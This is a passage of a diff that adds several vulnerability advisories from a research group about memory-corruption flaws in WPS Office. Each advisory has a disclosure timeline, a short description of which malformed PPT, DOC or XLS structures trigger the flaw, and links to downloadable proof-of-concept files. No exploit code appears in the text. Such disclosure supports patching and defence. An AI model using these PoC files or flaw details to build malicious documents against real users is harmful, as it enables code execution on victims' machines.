+suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
+
+WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
+
+The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
+
+(https://en.wikipedia.org/wiki/WPS_Office)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-11-24: Francis Provencher from COSIG report the issue to WPS;
+2015-12-06: WPS security confirm this issue;
+2016-01-01: COSIG ask an update status;
+2016-01-07: COSIG ask an update status;
+2016-01-14: COSIG ask an update status;
+2016-01-21: COSIG ask an update status;
+2016-02-01: COSIG release this advisory;
+
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+The specific flaw exists within the handling of a crafted PPT files with an invalid value into “texttype” in the “clientTextBox”
+into a “DrawingContainer”. An heap memory corruption occured and could allow remote attackers to execute arbitrary code
+on vulnerable installations of WPS. User interaction is required to exploit this vulnerability, the target must open a malicious file.
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/COSIG-2016-04.ppt
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39395.zip
+
+###############################################################################
diff --git a/platforms/windows/dos/39396.txt b/platforms/windows/dos/39396.txt
new file mode 100755
index 000000000..cbaff972e
--- /dev/null
+++ b/platforms/windows/dos/39396.txt
@@ -0,0 +1,73 @@
+#####################################################################################
+
+Application: WPS Office
+
+Platforms: Windows
+
+Versions: Version before 2016
+
+Author: Francis Provencher of COSIG
+
+Twitter: @COSIG_
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
+
+suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
+
+WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
+
+The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
+
+(https://en.wikipedia.org/wiki/WPS_Office)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-11-24: Francis Provencher from COSIG report the issue to WPS;
+2015-12-06: WPS security confirm this issue;
+2016-01-01: COSIG ask an update status;
+2016-01-07: COSIG ask an update status;
+2016-01-14: COSIG ask an update status;
+2016-01-21: COSIG ask an update status;
+2016-02-01: COSIG release this advisory;
+
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+
+
+This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
+User interaction is required to exploit this vulnerability, the target must open a malicious file.
+The specific flaw exists within the handling of a crafted DOC files with an invalid value into the “OneTableDocumentStream”
+data section causing a stackbase memory corruption.
+###############################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/COSIG-2016-05.doc
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39396.zip
+
+###############################################################################
diff --git a/platforms/windows/dos/39397.txt b/platforms/windows/dos/39397.txt
new file mode 100755
index 000000000..65057291d
--- /dev/null
+++ b/platforms/windows/dos/39397.txt
@@ -0,0 +1,71 @@
+#####################################################################################
+
+Application: WPS Office
+
+Platforms: Windows
+
+Versions: Version 2016
+
+Author: Francis Provencher of COSIG
+
+Twitter: @COSIG_
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
+
+suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
+
+WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
+
+The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
+
+(https://en.wikipedia.org/wiki/WPS_Office)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-12-31: Francis Provencher from COSIG report the issue to WPS;
+2016-01-04: WPS security confirm this issue;
+2016-01-14: COSIG ask an update status;
+2016-01-21: COSIG ask an update status;
+2016-02-01: COSIG release this advisory;
+
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
+User interaction is required to exploit this vulnerability in that the target must open a malicious file.
+
+The specific flaw exists within the handling of a crafted Presentation files with an invalid “Length” header in a drawingContainer.
+By providing a malformed .ppt file, an attacker can cause an memory corruption by dereferencing an uninitialized pointer.
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/COSIG-2016-06.ppt
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39397.zip
+
+###############################################################################
diff --git a/platforms/windows/dos/39398.txt b/platforms/windows/dos/39398.txt
new file mode 100755
index 000000000..30b81133a
--- /dev/null
+++ b/platforms/windows/dos/39398.txt
@@ -0,0 +1,70 @@
+#####################################################################################
+
+Application: WPS Office
+
+Platforms: Windows
+
+Versions: Version 2016
+
+Author: Francis Provencher of COSIG
+
+Twitter: @COSIG_
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
+
+suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
+
+WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
+
+The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
+
+(https://en.wikipedia.org/wiki/WPS_Office)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-12-31: Francis Provencher from COSIG report the issue to WPS;
+2016-01-04: WPS security confirm this issue;
+2016-01-14: COSIG ask an update status;
+2016-01-21: COSIG ask an update status;
+2016-02-01: COSIG release this advisory;
+
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
+User interaction is required to exploit this vulnerability in that the target must open a malicious file.
+By providing a malformed .xls file, an attacker can cause an heap memory corruption.
+An attacker could leverage this to execute arbitrary code under the context of the WPS Spreadsheet process.
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/COSIG-2016-07.xlsx
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39398.zip
+
+###############################################################################